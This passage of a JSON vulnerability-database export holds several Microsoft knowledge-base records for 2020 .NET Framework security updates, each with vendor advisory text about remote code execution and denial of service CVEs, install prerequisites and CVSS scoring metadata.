\n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n\n**Important**\n\n * Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 SP2, Windows Server 2008 R2 SP1, and Windows 7 SP1, require SHA-2 Code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. For more detailed information about SHA-2 code signing support updates, please see [KB 4474419](<https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update>).\n * All updates for .NET Framework 4.6 for Windows Server 2008 Service Pack 2 (SP2) require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>).\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. 
For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4532959](<https://support.microsoft.com/help/4532959>) Description of the Security Only Update for .NET Framework 2.0, 3.0 for Windows Server 2008 SP2 (KB4532959) \n * [4532964](<https://support.microsoft.com/help/4532964>) Description of the Security Only Update for .NET Framework 4.5.2 for Windows Server 2008 SP2 (KB4532964) \n * [4532971](<https://support.microsoft.com/help/4532971>) Description of the Security Only Update for .NET Framework 4.6 for Windows Server 2008 SP2 (KB4532971) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "Security Only Update for .NET Framework 2.0, 3.0, 4.5.2, 4.6 for Windows Server 2008 SP2 (KB4534979)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, 
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606", "CVE-2020-0646", "CVE-2020-0605"], "modified": "2020-01-14T08:00:00", "id": "KB4534979", "href": "https://support.microsoft.com/en-us/help/4534979", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:39:23", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5.1 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n** Important **\n\n * Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 SP2, Windows Server 2008 R2 SP1, and Windows 7SP1, require SHA-2 Code signing support. 
Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. For more detailed information about SHA-2 code signing support updates, please see [KB 4474419](<https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update>).\n * All updates for .NET Framework 4.7.2, 4.7.1, 4.7, 4.6.2, 4.6.1, and 4.6 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>).\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4532960](<https://support.microsoft.com/help/4532960>) Description of the Security Only Update for .NET Framework 3.5.1 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4532960)\n * [4532964](<https://support.microsoft.com/help/4532964>) Description of the Security Only Update for .NET Framework 4.5.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4532964)\n * [4532971](<https://support.microsoft.com/help/4532971>) Description of the Security Only Update for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4532971)\n * [4532952](<https://support.microsoft.com/help/4532952>) Description of the Security Only Update for .NET Framework 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4532952)\n\n## Information about 
protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "Security Only Update for .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4534976)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606", "CVE-2020-0646", "CVE-2020-0605"], "modified": "2020-01-14T08:00:00", "id": "KB4534976", "href": "https://support.microsoft.com/en-us/help/4534976", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T14:32:13", "description": "None\n**Applies to:**Microsoft .NET Framework 2.0 Microsoft .NET Framework 3.0 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 \n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input 
properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n\n**Important**\n\n * Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 SP2, Windows Server 2008 R2 SP1, and Windows 7 SP1, require SHA-2 Code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. For more detailed information about SHA-2 code signing support updates, please see [KB 4474419](<https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update>).\n * All updates for .NET Framework 4.6 for Windows Server 2008 Service Pack 2 (SP2) require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>).\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. 
For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4532944](<https://support.microsoft.com/help/4532944>) Description of the Security and Quality Rollup for .NET Framework 2.0, 3.0 for Windows Server 2008 SP2 (KB4532944) \n * [4532929](<https://support.microsoft.com/help/4532929>) Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows Server 2008 SP2 (KB4532929) \n * [4532932](<https://support.microsoft.com/help/4532932>) Description of the Security and Quality Rollup for .NET Framework 4.6 for Windows Server 2008 SP2 (KB4532932) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "Security and Quality Rollup for .NET Framework 2.0, 3.0, 4.5.2, 4.6 for Windows Server 2008 SP2 (KB4535105)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
"COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0646"], "modified": "2020-01-14T08:00:00", "id": "KB4535105", "href": "https://support.microsoft.com/en-us/help/4535105", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:42:37", "description": "<html><body><p>January 14, 2020-KB4532934 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1703</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <div class=\"row\"> <div class=\"col-xs-24\"> <p> Release Date:<br/><strong>January 14, 2020</strong></p> <p> Version:<br/><strong> .NET Framework 4.8</strong></p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. <br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). 
</p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><h2>Known issues in this update</h2><p> <span>Microsoft is not currently aware of any issues in this update.</span> </p><h2>How to get this update</h2><p> <strong>Install this update</strong> </p><p> This update will be downloaded and installed automatically from Windows Update.<br/></p><p> To get the standalone package for this update, go to the <span lang=\"EN\"><span><span><a data-content-id=\"\" data-content-type=\"\" href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4532934\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a></span></span></span> website. </p><p> <strong>File information</strong> </p><p> <span>For a list of the files that are provided in this update, download the </span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/1/2/8/128d5cd3-e60a-4d2a-a9da-48521ec80dee/4532934.csv\" managed-link=\"\" target=\"_blank\"> file information for cumulative update </a>. 
</p><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T00:00:00", "type": "mskb", "title": "January 14, 2020-KB4532934 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1703", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "modified": "2020-01-14T17:56:23", "id": "KB4532934", "href": "https://support.microsoft.com/en-us/help/4532934/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T14:32:10", "description": "**Applies to:** Microsoft .NET Framework 3.5.1 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE).\n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n\n**Important**\n\n * Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 SP2, Windows Server 2008 R2 SP1, and Windows 7 SP1, require SHA-2 code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. 
For more detailed information about SHA-2 code signing support updates, please see [KB 4474419](<https://support.microsoft.com/help/4474419>).\n * All updates for .NET Framework 4.7.2, 4.7.1, 4.7, 4.6.2, 4.6.1, and 4.6 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/help/4019990>).\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4532945](<https://support.microsoft.com/help/4532945>) Description of the Security and Quality Rollup for .NET Framework 3.5.1 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4532945) \n * [4532929](<https://support.microsoft.com/help/4532929>) Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4532929) \n * [4532932](<https://support.microsoft.com/help/4532932>) Description of the Security and Quality Rollup for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4532932) \n * [4532941](<https://support.microsoft.com/help/4532941>) Description of the Security and Quality Rollup for .NET Framework 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4532941) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: 
[Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "Security and Quality Rollup for .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4535102)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0646"], "modified": "2020-01-14T08:00:00", "id": "KB4535102", "href": "https://support.microsoft.com/en-us/help/4535102", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:39:25", "description": "None\nRelease Date: \n**January 14, 2020** Version: \n** .NET Framework 3.5, 4.7.2 and 4.8**\n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4532947](<https://support.microsoft.com/help/4532947>) Description of the Cumulative Update for .NET Framework 3.5 and 4.7.2 for Windows 10 Version 1809 and Windows Server 2019 (KB4532947) \n * [4532937](<https://support.microsoft.com/help/4532937>) Description of the Cumulative Update for .NET Framework 3.5 and 4.8 for Windows 10 Version 1809 and Windows Server 2019 (KB4532937) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "January 14, 2020-KB4535101 Cumulative Update for .NET Framework 3.5, 4.7.2 and 4.8 for Windows 
10 Version 1809 and Windows Server 2019", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606", "CVE-2020-0646", "CVE-2020-0605"], "modified": "2020-01-14T08:00:00", "id": "KB4535101", "href": "https://support.microsoft.com/en-us/help/4535101", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:48:53", "description": "<html><body><p>May 12, 2020-KB4552925 Cumulative Update for .NET Framework 3.5 and 4.8 for Windows 10 Version 2004</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <div class=\"row\"> <div class=\"col-xs-24\"> <p> Release Date:<br/><strong>May 12, 2020</strong></p> <p> Version:<br/><strong> .NET Framework 3.5 and 4.8</strong></p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. 
Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. </p><p> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a></li></ul><p> A denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. </p><p> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). 
</p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1108\" id=\"kb-link-2\" target=\"_self\">CVE-2020-1108</a></li></ul><h2>Known issues in this update</h2><p> <span>Microsoft is not currently aware of any issues in this update.</span> </p><h2>How to get this update</h2><p> <strong>Install this update</strong> </p><p> This update will be downloaded and installed automatically from Windows Update.<br/></p><p> To get the standalone package for this update, go to the <span lang=\"EN\"><span><span><a data-content-id=\"\" data-content-type=\"\" href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4552925\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a></span></span></span> website. </p><p> <strong>File information</strong> </p><p> <span>For a list of the files that are provided in this update, download the </span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/d/a/9/da9019da-7092-43c4-ac1a-95ab1a2928a0/4552925.csv\" managed-link=\"\" target=\"_blank\"> file information for cumulative update </a>. 
</p><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T00:00:00", "type": "mskb", "title": "May 12, 2020-KB4552925 Cumulative Update for .NET Framework 3.5 and 4.8 for Windows 10 Version 2004", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, 
